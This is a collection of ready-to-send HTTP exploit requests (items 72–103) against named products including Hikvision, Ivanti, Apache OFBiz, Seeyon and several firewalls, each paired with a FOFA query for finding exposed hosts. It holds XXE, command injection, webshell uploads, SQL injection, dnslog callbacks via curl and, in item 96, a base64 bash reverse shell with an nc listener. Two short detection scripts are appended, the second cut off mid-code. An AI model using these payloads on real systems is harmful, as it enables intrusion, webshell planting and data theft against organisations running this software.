User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. Seeyon OA getAjaxDataServlet XXE
FOFA: app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA: icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. Seeyon M3-Server 6_1sp1 deserialization RCE
FOFA: title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA: app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. 新开普掌上校园 service management platform service.action remote command execution
FOFA: title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
"command": "GetFZinfo",
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 garment management software UploadHandler.ashx arbitrary file upload
FOFA: body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction project quality supervision system FileUpload.ashx file upload
FOFA: icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE 百为 flow-control router remote command execution
FOFA: BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. 速达天耀 software DesignReportSave.jsp arbitrary file upload
FOFA: app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. Uniview (宇视) video surveillance main-cgi password disclosure
FOFA: app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
FOFA: app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA: title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA: title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
"type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA: body="sysaid-logo-dark-green.png"
The EXP request is as follows; it injects a Godzilla webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Result URL: http://x.x.x.x/userfiles/index.jsp

86. Japanese tosei self-service laundry machine RCE
FOFA: body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. 安恒 (DBAPPSecurity) 明御 security gateway aaa_local_web_preview file upload
FOFA: title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php

88. 安恒 (DBAPPSecurity) 明御 security gateway aaa_portal_auth_config_reset remote command execution
FOFA: title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php

89. Seeyon FE collaborative office platform editflow_manager SQL injection
FOFA: title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. Hikvision IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA: icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA: title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. Hikvision operations management center session command execution
Fastjson command execution
hunter: web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. Qi An Xin 网神 SecGate 3600 firewall app_av_import_save arbitrary file upload
FOFA: fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. Qi An Xin 网神 SecGate 3600 firewall obj_area_import_save arbitrary file upload
FOFA: fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial:

java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated base64 into the POC above (Content-Length must match the final body):

POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

The command output is returned in the exception message of the error response.

Reverse shell
Start a listener on Kali:

nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

Note: the base64 above decodes to a URL-encoded string (bash%20-i%20>&%20/dev/tcp/192.168.40.128/7777%200>&1), so the literal %20 sequences reach bash and the command name is wrong; base64-encode the plain command (bash -i >& /dev/tcp/192.168.40.128/7777 0>&1) instead.

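Detection for items 95 and 96, as an added example that is not part of the original article: both requests reach /webtools/control/ with requirePasswordChange=Y and an empty USERNAME, and item 95 additionally hides a ";/" path parameter in front of the query string. The scanner below strips the path parameter, checks those two conditions and reports matching lines from a combined-format access log. The log lines are constructed for the example, not taken from a real server.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed combined-format access-log lines (sample data, not from the article).
SAMPLE_LOG = """\
10.0.0.5 - - [20/Jan/2024:10:01:02 +0000] "POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1" 200 1532
10.0.0.5 - - [20/Jan/2024:10:01:09 +0000] "POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1" 200 844
10.0.0.7 - - [20/Jan/2024:10:02:00 +0000] "GET /webtools/control/main HTTP/1.1" 200 5120
10.0.0.9 - - [20/Jan/2024:10:03:00 +0000] "POST /webtools/control/ProgramExport?USERNAME=admin&PASSWORD=x&requirePasswordChange=Y HTTP/1.1" 302 0
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+)'
)


def servlet_path(target: str) -> str:
    """Path with any ';...' path parameter removed, so 'xmlrpc;/' matches 'xmlrpc'."""
    return urlsplit(target).path.split(";", 1)[0]


def is_ofbiz_bypass(target: str) -> bool:
    """True for the shape used in items 95 and 96: a /webtools/control/ request that
    carries requirePasswordChange=Y without supplying a USERNAME value."""
    if not servlet_path(target).startswith("/webtools/control/"):
        return False
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if query.get("requirePasswordChange", [""])[0] != "Y":
        return False
    return query.get("USERNAME", [""])[0] == ""


def scan_log(text: str):
    """Return (ip, method, servlet path) for every request line matching the bypass shape."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and is_ofbiz_bypass(m["target"]):
            hits.append((m["ip"], m["method"], servlet_path(m["target"])))
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print("OFBiz auth-bypass shape:", hit)
```

The match is on request shape only; a legitimate password-change flow carries a USERNAME, which is why the fourth sample line is not reported.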
97. OneBlog v2.2.2 Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"


98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

The leading %7D (}) closes the function body the platform wraps the script in and the trailing %7B ({) reopens it, so the Runtime.exec call is evaluated when the function is saved.


99. Ncast (盈可视) HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

Decoded body: {"name":"ping","serviceName":"SysManager","userTransaction":false,"param":["ping 127.0.0.1 | echo hello"]}


100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--


101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

The ../../ traversal out of the unauthenticated totp endpoint reaches the license keys-status endpoint without a session; the %3b (;) then injects the curl command.

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/> 
<ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>

The ds:RetrievalMethod URI is fetched server-side while the signature is processed; a DNS callback to the dnslog host confirms the SSRF.
103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 encoding of the following XML; the external parameter entity makes the server resolve the dnslog URL out of band:

<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

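Items 102 and 103 both smuggle a server-side fetch through SAML XML: item 102 points ds:RetrievalMethod at an attacker host, item 103 declares an external parameter entity in a DOCTYPE. The inspector below is an added example (my code, not the article's or Ivanti's): it decodes a SAMLRequest (base64, and raw-DEFLATE as in the HTTP-Redirect binding when present), reports a DTD before any parser touches the bytes, and otherwise parses the signature and flags RetrievalMethod URIs with an external scheme. The two hostile payloads are the page's own (item 102 with its extraction garbling repaired and whitespace trimmed); the benign AuthnRequest is constructed.

```python
import base64
import re
import zlib
import xml.etree.ElementTree as ET

DS_NS = "http://www.w3.org/2000/09/xmldsig#"
DTD_RE = re.compile(rb"<!(?:DOCTYPE|ENTITY)\b", re.IGNORECASE)
EXTERNAL_URI_RE = re.compile(r"(?i)^(?:https?|ftp|file|jar|gopher):")

# Page payloads: item 102 SOAP body (garbling repaired, trimmed) and item 103 SAMLRequest.
ITEM102_BODY = (
    b'<?xml version="1.0" encoding="UTF-8"?>'
    b'<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>'
    b'<ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"><ds:SignedInfo>'
    b'<ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>'
    b'<ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/></ds:SignedInfo>'
    b'<ds:SignatureValue>qwerty</ds:SignatureValue>'
    b'<ds:KeyInfo xmlns:ds="http://www.w3.org/2000/09/xmldsig#">'
    b'<ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><ds:X509Data/></ds:KeyInfo>'
    b'<ds:Object></ds:Object></ds:Signature></soap:Body></soap:Envelope>'
)
ITEM103_SAMLREQUEST = (
    "PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0K"
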